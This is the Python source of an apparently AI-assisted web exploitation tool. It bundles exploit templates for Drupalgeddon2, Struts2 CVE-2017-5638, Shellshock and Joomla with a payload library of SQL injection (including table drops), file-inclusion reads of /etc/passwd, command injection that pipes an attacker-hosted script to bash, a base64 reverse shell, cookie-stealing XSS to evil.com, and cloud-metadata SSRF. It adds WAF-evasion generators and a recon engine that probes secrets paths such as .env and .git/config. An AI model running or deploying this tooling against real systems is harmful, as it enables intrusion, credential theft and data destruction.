probe / app.py
wuhp's picture
Update app.py
99dbb05 verified
import asyncio
import httpx
import ssl
import csv
import time
import json
import base64
import hashlib
import re
import urllib.parse
import pandas as pd
import gradio as gr
from collections import defaultdict
from typing import Dict, List, Tuple, Any, Optional
from pydantic import BaseModel, Field
from datetime import datetime
import traceback
try:
from google import genai
from google.genai import types
GEMINI_AVAILABLE = True
except ImportError:
GEMINI_AVAILABLE = False
# ==============================================================================
# ENGINE CONTROLS & HEADERS
# ==============================================================================
# Intended cap on simultaneous recon tasks. Not referenced in the visible part
# of the file — presumably consumed by the scan orchestrator; verify.
MAX_CONCURRENT_RECON = 30
# Timeout handed to the httpx client used by the recon engine.
SCAN_TIMEOUT = 8.0
# Timeout handed to the httpx client used when delivering a payload; also
# recorded as the response time when that request times out.
EXPLOIT_TIMEOUT = 15.0
MAX_FIX_ITERATIONS = 3 # Maximum attempts to fix/refine a payload
# Default request headers merged into every outgoing HTTP request made by the
# recon and payload-delivery clients.
HTTP_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Accept": "text/html,application/json,*/*",
    "Accept-Language": "en-US,en;q=0.9",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "keep-alive",
}
# ==============================================================================
# METASPLOIT EXPLOIT TEMPLATES
# ==============================================================================
METASPLOIT_TEMPLATES = {
"drupal_drupalgeddon2": {
"name": "Drupal Drupalgeddon 2 RCE",
"description": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - RCE via form rendering",
"cve": "CVE-2018-7600",
"target_paths": ["/user/register", "/?q=user/register", "/user/password"],
"method": "POST",
"payload_template": {
"form_id": "user_register_form",
"mail[#post_render][]": "exec",
"mail[#type]": "markup",
"mail[#markup]": "{COMMAND}"
}
},
"joomla_http_header_rce": {
"name": "Joomla 3.0.0-3.4.6 RCE",
"description": "Joomla HTTP Header Unauthenticated Remote Code Execution",
"cve": "CVE-2015-8562",
"target_paths": ["/"],
"method": "GET",
"headers": {
"User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'"
}
},
"wordpress_xmlrpc_pingback": {
"name": "WordPress XML-RPC Pingback",
"description": "WordPress XML-RPC SSRF/Port Scanner",
"cve": "N/A",
"target_paths": ["/xmlrpc.php"],
"method": "POST",
"headers": {"Content-Type": "text/xml"},
"payload_template": """<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>{TARGET_URL}</string></value></param>
<param><value><string>{BLOG_URL}</string></value></param>
</params>
</methodCall>"""
},
"struts2_content_type": {
"name": "Apache Struts2 Content-Type RCE",
"description": "Apache Struts 2.3.5 - 2.3.31 / 2.5 - 2.5.10 RCE",
"cve": "CVE-2017-5638",
"target_paths": ["/"],
"method": "POST",
"headers": {
"Content-Type": "%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}
},
"shellshock": {
"name": "Shellshock (Bash Remote Code Execution)",
"description": "GNU Bash 4.3 and earlier Remote Code Execution",
"cve": "CVE-2014-6271",
"target_paths": ["/cgi-bin/status", "/cgi-bin/test.cgi", "/cgi-bin/admin.cgi"],
"method": "GET",
"headers": {
"User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'"
}
}
}
# ==============================================================================
# ADVANCED PAYLOAD LIBRARY (enriched)
# ==============================================================================
PAYLOAD_LIBRARY = {
"SQLi": {
"Time-Based Blind": [
"' OR SLEEP(5)--",
"' AND IF(1=1,SLEEP(5),0)--",
"'; WAITFOR DELAY '00:00:05'--",
"' OR pg_sleep(5)--",
"1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
"' OR 1=1 AND SLEEP(5)--",
"\" OR SLEEP(5)--",
"1; SELECT SLEEP(5)--",
],
"Union-Based": [
"' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT 1,@@version,3--",
"' UNION SELECT table_name,NULL FROM information_schema.tables--",
"-1' UNION ALL SELECT NULL,concat(username,0x3a,password),NULL FROM users--",
"' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--",
"' UNION SELECT NULL,load_file('/etc/passwd'),NULL--",
],
"Error-Based": [
"' AND extractvalue(1,concat(0x7e,version()))--",
"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--",
"' OR 1=convert(int,(SELECT @@version))--",
"' AND updatexml(1,concat(0x7e,(SELECT database())),1)--",
"' AND exp(~(SELECT * FROM (SELECT user())a))--",
],
"Boolean-Based": [
"' AND '1'='1",
"' AND '1'='2",
"' AND SUBSTRING(@@version,1,1)='5'--",
"' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--",
"' AND (SELECT COUNT(*) FROM users)>0--",
"' OR EXISTS(SELECT * FROM users)--",
],
"Stacked-Queries": [
"'; INSERT INTO users VALUES('hacked','hacked')--",
"'; UPDATE users SET password='hacked' WHERE '1'='1'--",
"'; DROP TABLE users--",
"'; EXEC xp_cmdshell('whoami')--",
],
"WAF-Bypass": [
"' /*!OR*/ 1=1--",
"' OR/**/1=1--",
"' %4fR 1=1--",
"'/**/OR/**/1=1--",
"' oR sLeEp(5)--",
"' OR 0x31=0x31--",
],
},
"LFI": {
"Basic": [
"../../../../etc/passwd",
"..\\..\\..\\..\\windows\\win.ini",
"....//....//....//etc/passwd",
"..%2f..%2f..%2fetc%2fpasswd",
"/etc/passwd",
"../../etc/shadow",
"../../etc/hosts",
],
"Null-Byte": [
"../../../../etc/passwd%00",
"../../../../etc/passwd%00.jpg",
"../../../../etc/passwd\x00",
"../../../../etc/passwd%00.php",
],
"Encoding": [
"....%252f....%252f....%252fetc%252fpasswd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
"..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
"%252e%252e%252f%252e%252e%252fetc%252fpasswd",
"..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd",
],
"Filter-Bypass": [
"/var/www/../../etc/passwd",
r"....\/....\/....\/etc/passwd",
"/etc/passwd/.",
"php://filter/convert.base64-encode/resource=/etc/passwd",
],
"PHP-Wrappers": [
"php://filter/convert.base64-encode/resource=index.php",
"php://filter/read=string.rot13/resource=config.php",
"data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
"php://input",
"phar://./test.phar/test.txt",
"zip://shell.jpg%23payload.php",
"expect://id",
],
"Log-Poisoning": [
"/var/log/apache2/access.log",
"/var/log/nginx/access.log",
"/proc/self/environ",
"/proc/self/fd/0",
"/var/log/auth.log",
],
},
"RCE": {
"Command-Injection": [
"; id",
"| whoami",
"`uname -a`",
"$(cat /etc/passwd)",
"; curl http://attacker.com/shell.sh | bash",
"&& id",
"|| id",
"; ls -la /",
"\n id",
"%0a id",
],
"PHP-Exec": [
"<?php system($_GET['cmd']); ?>",
"<?php passthru($_GET['c']); ?>",
"<?php echo shell_exec('id'); ?>",
"<?php echo `id`; ?>",
"<?php proc_open('id',array(),$pipes); ?>",
],
"Encoded": [
"; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash",
"; ${IFS}id",
"; cat</etc/passwd",
"; {id}",
"$(IFS=,;cmd=id;$cmd)",
],
"Template-Injection": [
"{{7*7}}",
"${7*7}",
"#{7*7}",
"<%= 7*7 %>",
"{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
"${T(java.lang.Runtime).getRuntime().exec('id')}",
],
},
"XSS": {
"Reflected": [
"<script>alert(document.domain)</script>",
"<img src=x onerror=alert(1)>",
"<svg/onload=alert(1)>",
"'-alert(1)-'",
"<body onload=alert(1)>",
"\"><script>alert(1)</script>",
"'><img src=x onerror=alert(1)>",
],
"Stored": [
"<script>fetch('https://evil.com/?c='+document.cookie)</script>",
"<img src=x onerror=\"this.src='https://evil.com/?c='+btoa(document.cookie)\">",
"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
],
"DOM-Based": [
"javascript:alert(1)",
"#<script>alert(1)</script>",
"#\"><img src=x onerror=alert(1)>",
],
"Encoded": [
"%3Cscript%3Ealert(1)%3C/script%3E",
"&#60;script&#62;alert(1)&#60;/script&#62;",
"\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
"\\u003cscript\\u003ealert(1)\\u003c/script\\u003e",
],
"Filter-Bypass": [
"<ScRiPt>alert(1)</sCrIpT>",
"<script src=//evil.com/x.js>",
"<iframe src=javascript:alert(1)>",
"<details open ontoggle=alert(1)>",
"<input autofocus onfocus=alert(1)>",
"<select onchange=alert(1)><option>1</option></select>",
],
},
"XXE": {
"Basic": [
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><root>&xxe;</root>',
],
"OOB": [
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]><root>test</root>',
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>',
],
},
"SSRF": {
"Internal": [
"http://127.0.0.1",
"http://localhost",
"http://169.254.169.254/latest/meta-data/",
"http://[::1]",
"http://0.0.0.0",
"http://0177.0.0.1",
"http://2130706433",
],
"Cloud-Metadata": [
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://metadata.google.internal/computeMetadata/v1/",
"http://169.254.169.254/metadata/instance?api-version=2021-02-01",
],
"Protocol-Bypass": [
"file:///etc/passwd",
"dict://127.0.0.1:6379/info",
"gopher://127.0.0.1:9200/",
"sftp://attacker.com",
],
},
"NoSQLi": {
"MongoDB": [
'{"username": {"$ne": null}, "password": {"$ne": null}}',
'{"username": {"$gt": ""}, "password": {"$gt": ""}}',
"' || '1'=='1",
"username[$ne]=invalid&password[$ne]=invalid",
'{"$where": "sleep(5000)"}',
],
},
"SSTI": {
"Detection": [
"{{7*7}}",
"${7*7}",
"#{7*7}",
"<%= 7*7 %>",
"{{7*'7'}}",
],
"Jinja2-RCE": [
"{{''.__class__.__mro__[1].__subclasses__()}}",
"{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
"{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__'].eval(\"__import__('os').system('id')\") }}{%endif%}{%endfor%}",
],
},
}
# ==============================================================================
# PAYLOAD CODE TEMPLATES (improved with smarter generators)
# ==============================================================================
PAYLOAD_CODE_TEMPLATES = {
"SQLi_TimeBased": '''import urllib.parse
def generate_sqli_time_payload(delay=5, db_type="mysql", encoding=None, waf_bypass=False):
"""Generate time-based SQL injection payload with optional evasion."""
base = {
"mysql": f"' OR SLEEP({delay})--",
"mssql": f"'; WAITFOR DELAY '00:00:0{delay}'--",
"postgres": f"' OR pg_sleep({delay})--",
"oracle": f"' OR 1=1 AND dbms_pipe.receive_message(('a'),{delay}) IS NULL--",
}.get(db_type, f"' OR SLEEP({delay})--")
if waf_bypass:
# Inline comment evasion
base = base.replace(" ", "/**/")
if encoding == "url":
return urllib.parse.quote(base)
elif encoding == "double_url":
return urllib.parse.quote(urllib.parse.quote(base))
return base
# Usage
payload = generate_sqli_time_payload(delay=5, db_type="mysql", waf_bypass=True)
print(payload)
''',
"SQLi_Union": '''def generate_sqli_union(cols=3, target_col=2, target_expr="@@version", db_type="mysql"):
"""Generate UNION-based SQL injection for data extraction."""
nulls = ",".join(
target_expr if i == target_col else "NULL"
for i in range(1, cols + 1)
)
payload = f"' UNION SELECT {nulls}--"
if db_type == "postgres":
payload = f"' UNION SELECT {nulls}--"
elif db_type == "mssql":
payload = f"' UNION SELECT {nulls}--"
return payload
# Enumerate tables (MySQL)
print(generate_sqli_union(cols=3, target_col=2,
target_expr="group_concat(table_name)", db_type="mysql"))
# Get version
print(generate_sqli_union(cols=3, target_col=2, target_expr="@@version"))
''',
"LFI_Basic": '''import urllib.parse
def generate_lfi_payload(depth=4, target="etc/passwd", os_type="linux",
encoding=None, null_byte=False):
"""Generate LFI path traversal payload with encoding options."""
if os_type == "linux":
traversal = "../" * depth
raw = f"{traversal}{target}"
else:
traversal = "..\\\\" * depth
raw = f"{traversal}windows\\\\win.ini"
if null_byte:
raw += "%00"
if encoding == "url":
return urllib.parse.quote(raw, safe="")
elif encoding == "double_url":
return urllib.parse.quote(urllib.parse.quote(raw, safe=""), safe="")
elif encoding == "unicode":
return raw.replace("/", "%c0%af").replace(".", "%c0%ae")
elif encoding == "overlong":
return raw.replace("/", "%2f").replace(".", "%2e")
return raw
# Basic
print(generate_lfi_payload(depth=5, target="etc/passwd"))
# Null-byte bypass
print(generate_lfi_payload(depth=5, target="etc/passwd", null_byte=True))
# Double-URL encoded
print(generate_lfi_payload(depth=5, target="etc/passwd", encoding="double_url"))
''',
"LFI_PHP_Wrappers": '''def php_filter_payload(resource="index.php", encode="base64"):
"""Generate PHP wrapper LFI payloads."""
payloads = {
"base64": f"php://filter/convert.base64-encode/resource={resource}",
"rot13": f"php://filter/read=string.rot13/resource={resource}",
"zlib": f"php://filter/zlib.deflate/convert.base64-encode/resource={resource}",
"stdin": "php://input",
"data": "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
"expect": "expect://id",
"phar": "phar://./uploaded.phar/shell.php",
}
return payloads.get(encode, payloads["base64"])
def decode_base64_lfi(b64_string):
"""Decode base64-encoded file content from LFI response."""
import base64
try:
return base64.b64decode(b64_string).decode("utf-8", errors="replace")
except Exception as e:
return f"Decode error: {e}"
# Get source code of config file
print(php_filter_payload("config.php", "base64"))
# RCE via data wrapper
print(php_filter_payload(encode="data"))
''',
"RCE_CommandInjection": '''import urllib.parse
def generate_rce_payload(command="id", separator=";", encoding=None, bypass_spaces=False):
"""Generate OS command injection payload with evasion."""
if bypass_spaces:
command = command.replace(" ", "${IFS}")
separators = {
"semicolon": f"; {command}",
"pipe": f"| {command}",
"background": f"& {command}",
"or": f"|| {command}",
"and": f"&& {command}",
"newline": f"%0a{command}",
"backtick": f"`{command}`",
"subshell": f"$({command})",
}
raw = separators.get(separator, f"; {command}")
if encoding == "url":
return urllib.parse.quote(raw, safe="")
elif encoding == "double_url":
return urllib.parse.quote(urllib.parse.quote(raw, safe=""), safe="")
return raw
# Basic RCE
print(generate_rce_payload("whoami", "semicolon"))
# Space-bypass
print(generate_rce_payload("cat /etc/passwd", "subshell", bypass_spaces=True))
# URL-encoded newline injection
print(generate_rce_payload("id", "newline", encoding="url"))
''',
"XSS_Basic": '''def generate_xss_payload(context="html", bypass=False, exfil_url=None):
"""
Generate context-aware XSS payload.
context: html | attr | js | url
"""
base_payloads = {
"html": "<script>alert(document.domain)</script>",
"attr": "\" onmouseover=\"alert(1)",
"js": "';alert(1)//",
"url": "javascript:alert(1)",
"svg": "<svg/onload=alert(1)>",
"img": "<img src=x onerror=alert(1)>",
}
payload = base_payloads.get(context, base_payloads["html"])
if exfil_url:
payload = f"<script>fetch('{exfil_url}?c='+encodeURIComponent(document.cookie))</script>"
if bypass:
payload = payload.replace("<script", "<ScRiPt").replace("</script", "</sCrIpT")
return payload
# Basic reflected XSS
print(generate_xss_payload("html"))
# Attribute context
print(generate_xss_payload("attr"))
# Cookie stealer
print(generate_xss_payload(exfil_url="https://evil.com/log"))
# Case-bypass
print(generate_xss_payload("html", bypass=True))
''',
"SSTI_Detection": '''def generate_ssti_probes():
"""Generate SSTI detection probes for multiple template engines."""
probes = {
"Jinja2/Twig": "{{7*7}}", # expect: 49
"FreeMarker": "${7*7}", # expect: 49
"Velocity": "#set($x=7*7)$x", # expect: 49
"Smarty": "{7*7}", # expect: 49
"ERB (Ruby)": "<%= 7*7 %>", # expect: 49
"Pebble": "{{7*'7'}}", # Jinja2: 49, Twig: 7777777
"Mako": "${7*7}",
}
return probes
def generate_jinja2_rce(command="id"):
"""Generate Jinja2 RCE payload."""
return (
"{%for c in [].__class__.__base__.__subclasses__()%}"
"{%if c.__name__=='catch_warnings'%}"
"{{c.__init__.__globals__['__builtins__']"
f".eval(\"__import__('os').popen('{command}').read()\")"
"}}{%endif%}{%endfor%}"
)
for engine, probe in generate_ssti_probes().items():
print(f"{engine}: {probe}")
print("\\nRCE:", generate_jinja2_rce("id"))
''',
"Custom": '''import urllib.parse, base64, re
def generate_custom_payload(base_payload, encoding=None, evasion=None, prefix="", suffix=""):
"""
Flexible payload generator.
Args:
base_payload : The base attack string
encoding : url | double_url | base64 | html_entity | unicode_escape
evasion : case_variation | comment_insertion | whitespace_abuse | null_bytes
prefix/suffix: Wrap the final payload
"""
result = base_payload
# Evasion transforms (applied before encoding)
if evasion == "case_variation":
result = "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(result))
elif evasion == "comment_insertion":
result = result.replace(" ", "/**/")
elif evasion == "whitespace_abuse":
result = result.replace(" ", "%09") # tab
elif evasion == "null_bytes":
result = result.replace(" ", "%00 ")
# Encoding layer
if encoding == "url":
result = urllib.parse.quote(result, safe="")
elif encoding == "double_url":
result = urllib.parse.quote(urllib.parse.quote(result, safe=""), safe="")
elif encoding == "base64":
result = base64.b64encode(result.encode()).decode()
elif encoding == "html_entity":
result = "".join(f"&#{ord(c)};" for c in result)
elif encoding == "unicode_escape":
result = result.encode("unicode_escape").decode()
return f"{prefix}{result}{suffix}"
# Example: SQLi with comment-insertion WAF bypass
print(generate_custom_payload("' OR 1=1--", evasion="comment_insertion"))
# URL-encoded XSS
print(generate_custom_payload("<script>alert(1)</script>", encoding="url"))
# Double-URL LFI
print(generate_custom_payload("../../../../etc/passwd", encoding="double_url"))
'''
}
# ==============================================================================
# AI STRUCTURED OUTPUT SCHEMAS
# ==============================================================================
# Structured-output schema for a vulnerability assessment of one target.
# This is the (optional) return type of ai_analyze_target. Only the two list
# fields `secondary_vulns` and `related_cves` carry defaults; every other
# field is required.
class VulnerabilityAnalysis(BaseModel):
    vulnerability_type: str = Field(description="Primary vulnerability class (SQLi, LFI, RCE, XSS, SSTI, NoSQLi, etc.)")
    confidence: str = Field(description="Confidence level: High, Medium, Low")
    attack_vector: str = Field(description="Specific attack approach")
    target_parameters: List[str] = Field(description="Vulnerable parameters or paths")
    reasoning: str = Field(description="Technical reasoning for this assessment")
    secondary_vulns: List[str] = Field(default=[], description="Other potential vulnerabilities to probe")
    related_cves: List[str] = Field(default=[], description="Known CVEs that might apply")
# Structured-output schema describing how a finding should be tested: the
# endpoint, methodology, and the HTTP request shape. `http_method` defaults to
# "GET"; `content_type`, `request_body_template` and `metasploit_template`
# default to the empty string.
class AttackStrategy(BaseModel):
    vulnerability_class: str = Field(description="Class of vulnerability")
    target_endpoint: str = Field(description="Specific endpoint and parameter")
    strategy: str = Field(description="Attack methodology")
    evasion_techniques: List[str] = Field(description="WAF/IDS evasion methods to apply")
    expected_indicators: List[str] = Field(description="Success indicators to look for")
    http_method: str = Field(default="GET", description="HTTP method to use: GET, POST, PUT")
    content_type: str = Field(default="", description="Content-Type header if POST/PUT needed")
    request_body_template: str = Field(default="", description="Body template for POST requests, use {PAYLOAD} placeholder")
    metasploit_template: str = Field(default="", description="Metasploit template to use if applicable")
# Structured-output schema for one generated payload plus the Python snippet
# that produces it. The last three fields mirror the delivery options of
# advanced_payload_fire (`http_method`, `inject_in_body`, `content_type`) and
# all have defaults.
class PayloadGeneration(BaseModel):
    payload: str = Field(description="The exact payload string")
    code_template: str = Field(description="Python code to generate this payload")
    encoding: str = Field(description="Encoding applied (none, url, double-url, base64, etc.)")
    reasoning: str = Field(description="Why this payload is effective")
    alternative_payloads: List[str] = Field(description="Backup payloads if primary fails")
    http_method: str = Field(default="GET", description="HTTP method")
    inject_in_body: bool = Field(default=False, description="True if payload goes in body, not URL")
    content_type: str = Field(default="", description="Content-Type for body injection")
# Structured-output schema for the assessment of a test result: whether it
# succeeded, the supporting evidence, and follow-up suggestions.
# `vuln_confirmed` defaults to "" and `fix_suggestions` to an empty list.
class ExploitAnalysis(BaseModel):
    success: bool = Field(description="Whether exploit succeeded")
    evidence: List[str] = Field(description="Evidence of successful exploitation")
    next_steps: List[str] = Field(description="Recommended next actions")
    data_extracted: str = Field(description="Any sensitive data found")
    vuln_confirmed: str = Field(default="", description="Confirmed vulnerability type")
    fix_suggestions: List[str] = Field(default=[], description="Suggestions to fix/improve the payload if it failed")
# Structured-output schema for a chat turn with the operator: a natural
# language reply together with the suggested endpoint, payload and generator
# code. Only `http_method` has a default ("GET").
class CentaurChatResponse(BaseModel):
    chat_reply: str = Field(description="Natural language response to operator")
    suggested_endpoint: str = Field(description="Updated target endpoint")
    suggested_payload: str = Field(description="Patched/generated payload")
    suggested_code: str = Field(description="Python code to generate the payload")
    technical_analysis: str = Field(description="Technical explanation of changes")
    http_method: str = Field(default="GET", description="HTTP method to use")
# Structured-output schema for a patched code template: the new code, an
# itemised list of changes, and the rationale. All three fields are required.
class PayloadPatchResponse(BaseModel):
    updated_code: str = Field(description="The patched Python code")
    changes_made: List[str] = Field(description="List of specific changes applied")
    explanation: str = Field(description="Explanation of why these changes help")
# ==============================================================================
# LOGGING SYSTEM
# ==============================================================================
class ExploitLogger:
    """In-memory collector of timestamped log records.

    Each record is a dict with the keys ``timestamp``, ``level``,
    ``message`` and ``context``; records are kept in insertion order in
    ``self.logs``.
    """

    def __init__(self):
        self.logs = []

    def log(self, level: str, message: str, context: dict = None):
        """Store a new record and hand it back to the caller."""
        stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        record = dict(
            timestamp=stamp[:-3],  # drop the last three digits: micro -> milliseconds
            level=level,
            message=message,
            context=context if context else {},
        )
        self.logs.append(record)
        return record

    def get_logs(self, level=None):
        """Return every record, or only those whose level equals ``level``.

        Without a (truthy) level the internal list itself is returned, not
        a copy.
        """
        if not level:
            return self.logs
        return list(filter(lambda rec: rec["level"] == level, self.logs))

    def format_logs(self):
        """Render all records as newline-separated text lines."""

        def render(rec):
            suffix = f" | {rec['context']}" if rec["context"] else ""
            return f"[{rec['timestamp']}] {rec['level']}: {rec['message']}{suffix}"

        return "\n".join(render(rec) for rec in self.logs)

    def clear(self):
        """Forget all records by rebinding ``self.logs`` to a fresh list."""
        self.logs = []
exploit_logger = ExploitLogger()
# ==============================================================================
# RECON ENGINE
# ==============================================================================
class ReconProfile:
    """Mutable record of everything learned about one ``host:port`` target.

    A fresh profile starts out "not alive", with protocol ``http``, unknown
    server banner, no WAF, and empty finding collections.
    """

    def __init__(self, host: str, port: int):
        # Identity
        self.target_id = f"{host}:{port}"
        self.host = host
        self.port = port
        # Connection-level facts
        self.protocol = "http"
        self.is_alive = False
        self.server_banner = "Unknown"
        self.waf_detected = "None"
        # Findings
        self.discovered_paths = list()
        self.error_signatures = list()
        self.technologies = list()
        self.cookies = dict()
        self.forms_found = list()
        self.api_endpoints = list()
        self.response_time_baseline = 0.0
        self.redirect_chain = list()
        self.injectable_params = list()
        self.cms_detected = ""

    @property
    def is_exploitable(self):
        """True when the target is alive and at least one finding exists.

        A finding is any discovered path, error signature, form, API
        endpoint, or a server banner other than ``"Unknown"``.
        """
        if not self.is_alive:
            return self.is_alive
        if len(self.discovered_paths) > 0:
            return True
        if len(self.error_signatures) > 0:
            return True
        if len(self.forms_found) > 0:
            return True
        if len(self.api_endpoints) > 0:
            return True
        return self.server_banner != "Unknown"

    def to_dict(self):
        """Summarise the profile as a flat dict (counts instead of lists)."""
        tallies = {
            label: len(found)
            for label, found in (
                ("paths", self.discovered_paths),
                ("errors", self.error_signatures),
                ("forms", self.forms_found),
                ("apis", self.api_endpoints),
            )
        }
        top_tech = self.technologies[:3]  # only the first three are shown
        return {
            "target_id": self.target_id,
            "protocol": self.protocol,
            "server": self.server_banner,
            "waf": self.waf_detected,
            "cms": self.cms_detected,
            **tallies,
            "tech": ", ".join(top_tech),
        }
class AdvancedReconEngine:
    """Collect basic HTTP reconnaissance data for one target.

    ``run()`` detects the scheme, fetches ``/``, records technology and WAF
    hints, probes a fixed list of paths and measures a response-time
    baseline. Every finding is written onto the ``ReconProfile`` passed to
    the constructor, which ``run()`` also returns.
    """

    # Fixed set of paths requested by ``_scan_paths``.
    _PROBE_PATHS = (
        "/admin", "/administrator", "/admin.php", "/wp-admin", "/phpmyadmin",
        "/cpanel", "/controlpanel", "/dashboard",
        "/.env", "/.git/config", "/config.php", "/wp-config.php",
        "/web.config", "/.htaccess", "/robots.txt", "/sitemap.xml",
        "/api", "/api/v1", "/api/v2", "/graphql", "/rest",
        "/api/users", "/api/admin", "/api/config",
        "/upload", "/uploads", "/files", "/download",
        "/search", "/login", "/logout", "/register",
        "/?id=1", "/?user=admin", "/?file=index",
        "/search?q=test", "/api/users?id=1",
        "/index.php?page=home", "/?page=about",
        "/xmlrpc.php", "/cgi-bin/status",
    )

    # Status codes that count as "the path exists".
    _INTERESTING_STATUSES = (200, 401, 403, 405)

    # Lower-case substrings that indicate a leaked error message.
    _ERROR_PATTERNS = (
        "sql syntax", "mysql", "postgresql", "mssql", "oracle error",
        "syntax error", "database error", "query failed",
        "stack trace", "traceback", "exception",
        "warning:", "fatal error", "parse error",
        "undefined index", "undefined variable",
        "mysql_fetch", "pg_query", "sqlite",
        "odbc", "jdbc", "ado.net",
    )

    # WAF name -> header substrings hinting at it; first match wins.
    _WAF_INDICATORS = {
        "cloudflare": ["cf-ray", "__cfduid"],
        "akamai": ["akamai", "ak_bmsc"],
        "aws-waf": ["x-amzn-trace-id", "x-amz-"],
        "imperva": ["x-iinfo", "incap_ses"],
        "f5": ["x-wa-info", "f5"],
        "fortiweb": ["fortigate", "fortiweb"],
        "modsecurity": ["mod_security", "modsec"],
    }

    def __init__(self, profile: ReconProfile):
        self.p = profile
        self.client = httpx.AsyncClient(
            verify=False,
            timeout=SCAN_TIMEOUT,
            headers=HTTP_HEADERS,
            follow_redirects=True,
            max_redirects=3
        )

    async def _detect_protocol(self):
        """Set ``profile.protocol`` to ``https`` if a TLS connection can be opened."""
        conf = ssl.create_default_context()
        conf.check_hostname = False
        conf.verify_mode = ssl.CERT_NONE
        try:
            _reader, writer = await asyncio.wait_for(
                asyncio.open_connection(self.p.host, self.p.port, ssl=conf),
                timeout=2.0
            )
        except Exception:
            self.p.protocol = "http"
            return
        # The connection was established over TLS, so the verdict is final
        # here; a failure while closing the socket must not flip it back.
        self.p.protocol = "https"
        writer.close()
        try:
            await writer.wait_closed()
        except Exception:
            pass

    def _url(self, path=""):
        """Build an absolute URL for ``path`` on the profiled target."""
        return f"{self.p.protocol}://{self.p.host}:{self.p.port}{path}"

    async def _fingerprint_tech(self, response):
        """Record technology, CMS and WAF hints found in one response."""
        headers = response.headers
        body = response.text.lower()
        cookie_text = str(response.cookies)
        powered_by = headers.get("x-powered-by", "").lower()
        server = headers.get("server", "").lower()

        if "x-powered-by" in headers:
            self.p.technologies.append(f"Powered-By: {headers['x-powered-by']}")
        if "laravel" in body or "laravel_session" in cookie_text:
            self.p.technologies.append("Laravel")
        if "wordpress" in body or "wp-content" in body:
            self.p.technologies.append("WordPress")
            self.p.cms_detected = "WordPress"
        if "django" in body or "csrftoken" in cookie_text:
            self.p.technologies.append("Django")
        if "express" in powered_by:
            self.p.technologies.append("Express.js")
        if "flask" in body or "werkzeug" in server:
            self.p.technologies.append("Flask")
        if "joomla" in body:
            self.p.technologies.append("Joomla")
            self.p.cms_detected = "Joomla"
        if "drupal" in body:
            self.p.technologies.append("Drupal")
            self.p.cms_detected = "Drupal"
        if "struts" in body or "struts" in powered_by:
            self.p.technologies.append("Apache Struts")

        # Stringify the headers once instead of once per indicator.
        header_text = str(headers).lower()
        for waf_name, indicators in self._WAF_INDICATORS.items():
            if any(ind in header_text for ind in indicators):
                self.p.waf_detected = waf_name.upper()
                break

    async def _scan_paths(self):
        """Request every probe path concurrently and record what responds."""
        paths = self._PROBE_PATHS
        tasks = [self.client.get(self._url(p)) for p in paths]
        results = await asyncio.gather(*tasks, return_exceptions=True)
        for path, res in zip(paths, results):
            if isinstance(res, Exception):
                continue  # unreachable path: nothing to record
            if hasattr(res, 'history') and res.history:
                self.p.redirect_chain.append(f"{path} -> {res.url}")
            if res.status_code in self._INTERESTING_STATUSES:
                if "?" not in path:
                    self.p.discovered_paths.append(path)
                else:
                    self.p.api_endpoints.append(path)
                    # Each match is a 2-tuple; exactly one group is non-empty.
                    for p_match in re.findall(r'\?([^=]+)=|&([^=]+)=', path):
                        param = p_match[0] or p_match[1]
                        if param and param not in self.p.injectable_params:
                            self.p.injectable_params.append(param)

            body_lower = res.text.lower()
            if "<form" in body_lower:
                self.p.forms_found.append(path)
